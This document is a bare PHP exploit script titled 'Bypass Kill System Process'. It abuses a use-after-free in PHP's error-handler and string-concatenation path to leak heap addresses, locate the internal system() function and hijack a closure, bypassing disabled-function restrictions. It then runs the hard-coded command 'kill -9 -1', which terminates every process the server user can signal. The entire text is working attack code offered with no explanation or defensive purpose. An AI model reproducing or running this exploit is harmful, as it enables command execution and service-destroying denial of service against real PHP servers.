Bypass Kill System Process

1. <?php
2. opcache_reset();
3. new Pwn("kill -9 -1");
4.  
5. class Helper { public $a, $b, $c; }
6. class Pwn {
7.     const LOGGING = false;
8.     const CHUNK_DATA_SIZE = 0x60;
9.     const CHUNK_SIZE = ZEND_DEBUG_BUILD ? self::CHUNK_DATA_SIZE + 0x20 : self::CHUNK_DATA_SIZE;
10.     const STRING_SIZE = self::CHUNK_DATA_SIZE - 0x18 - 1;
11.  
12.     const HT_SIZE = 0x118;
13.     const HT_STRING_SIZE = self::HT_SIZE - 0x18 - 1;
14.  
15.     public function __construct($cmd) {
16.         for($i = 0; $i < 10; $i++) {
17.             $groom[] = self::alloc(self::STRING_SIZE);
18.             $groom[] = self::alloc(self::HT_STRING_SIZE);
19.         }
20.        
21.         $concat_str_addr = self::str2ptr($this->heap_leak(), 16);
22.         $fill = self::alloc(self::STRING_SIZE);
23.  
24.         $this->abc = self::alloc(self::STRING_SIZE);
25.         $abc_addr = $concat_str_addr + self::CHUNK_SIZE;
26.         self::log("abc @ 0x%x", $abc_addr);
27.  
28.         $this->free($abc_addr);
29.         $this->helper = new Helper;
30.         if(strlen($this->abc) < 0x1337) {
31.             self::log("uaf failed");
32.             return;
33.         }
34.  
35.         $this->helper->a = "leet";
36.         $this->helper->b = function($x) {};
37.         $this->helper->c = 0xfeedface;
38.  
39.         $helper_handlers = $this->rel_read(0);
40.         self::log("helper handlers @ 0x%x", $helper_handlers);
41.  
42.         $closure_addr = $this->rel_read(0x20);
43.         self::log("real closure @ 0x%x", $closure_addr);
44.  
45.         $closure_ce = $this->read($closure_addr + 0x10);
46.         self::log("closure class_entry @ 0x%x", $closure_ce);
47.        
48.         $basic_funcs = $this->get_basic_funcs($closure_ce);
49.         self::log("basic_functions @ 0x%x", $basic_funcs);
50.  
51.         $zif_system = $this->get_system($basic_funcs);
52.         self::log("zif_system @ 0x%x", $zif_system);
53.  
54.         $fake_closure_off = 0x70;
55.         for($i = 0; $i < 0x138; $i += 8) {
56.             $this->rel_write($fake_closure_off + $i, $this->read($closure_addr + $i));
57.         }
58.         $this->rel_write($fake_closure_off + 0x38, 1, 4);
59.         $handler_offset = PHP_MAJOR_VERSION === 8 ? 0x70 : 0x68;
60.         $this->rel_write($fake_closure_off + $handler_offset, $zif_system);
61.  
62.         $fake_closure_addr = $abc_addr + $fake_closure_off + 0x18;
63.         self::log("fake closure @ 0x%x", $fake_closure_addr);
64.  
65.         $this->rel_write(0x20, $fake_closure_addr);
66.         ($this->helper->b)($cmd);
67.  
68.         $this->rel_write(0x20, $closure_addr);
69.         unset($this->helper->b);
70.     }
71.  
72.     private function heap_leak() {
73.         $arr = [[], []];
74.         set_error_handler(function() use (&$arr, &$buf) {
75.             $arr = 1;
76.             $buf = str_repeat("\x00", self::HT_STRING_SIZE);
77.         });
78.         $arr[1] .= self::alloc(self::STRING_SIZE - strlen("Array"));
79.         return $buf;
80.     }
81.  
82.     private function free($addr) {
83.         $payload = pack("Q*", 0xdeadbeef, 0xcafebabe, $addr);
84.         $payload .= str_repeat("A", self::HT_STRING_SIZE - strlen($payload));
85.        
86.         $arr = [[], []];
87.         set_error_handler(function() use (&$arr, &$buf, &$payload) {
88.             $arr = 1;
89.             $buf = str_repeat($payload, 1);
90.         });
91.         $arr[1] .= "x";
92.     }
93.  
94.     private function rel_read($offset) {
95.         return self::str2ptr($this->abc, $offset);
96.     }
97.  
98.     private function rel_write($offset, $value, $n = 8) {
99.         for ($i = 0; $i < $n; $i++) {
100.             $this->abc[$offset + $i] = chr($value & 0xff);
101.             $value >>= 8;
102.         }
103.     }
104.  
105.     private function read($addr, $n = 8) {
106.         $this->rel_write(0x10, $addr - 0x10);
107.         $value = strlen($this->helper->a);
108.         if($n !== 8) { $value &= (1 << ($n << 3)) - 1; }
109.         return $value;
110.     }
111.  
112.     private function get_system($basic_funcs) {
113.         $addr = $basic_funcs;
114.         do {
115.             $f_entry = $this->read($addr);
116.             $f_name = $this->read($f_entry, 6);
117.             if($f_name === 0x6d6574737973) {
118.                 return $this->read($addr + 8);
119.             }
120.             $addr += 0x20;
121.         } while($f_entry !== 0);
122.     }
123.  
124.     private function get_basic_funcs($addr) {
125.         while(true) {
126.             $addr -= 0x10;
127.             if($this->read($addr, 4) === 0xA8 &&
128.                 in_array($this->read($addr + 4, 4),
129.                     [20180731, 20190902, 20200930, 20210902])) {
130.                 $module_name_addr = $this->read($addr + 0x20);
131.                 $module_name = $this->read($module_name_addr);
132.                 if($module_name === 0x647261646e617473) {
133.                     self::log("standard module @ 0x%x", $addr);
134.                     return $this->read($addr + 0x28);
135.                 }
136.             }
137.         }
138.     }
139.  
140.     private function log($format, $val = "") {
141.         if(self::LOGGING) {
142.             printf("{$format}\n", $val);
143.         }
144.     }
145.  
146.     static function alloc($size) {
147.         return str_shuffle(str_repeat("A", $size));
148.     }
149.  
150.     static function str2ptr($str, $p = 0, $n = 8) {
151.         $address = 0;
152.         for($j = $n - 1; $j >= 0; $j--) {
153.             $address <<= 8;
154.             $address |= ord($str[$p + $j]);
155.         }
156.         return $address;
157.     }
158. }
159.  
160. ?>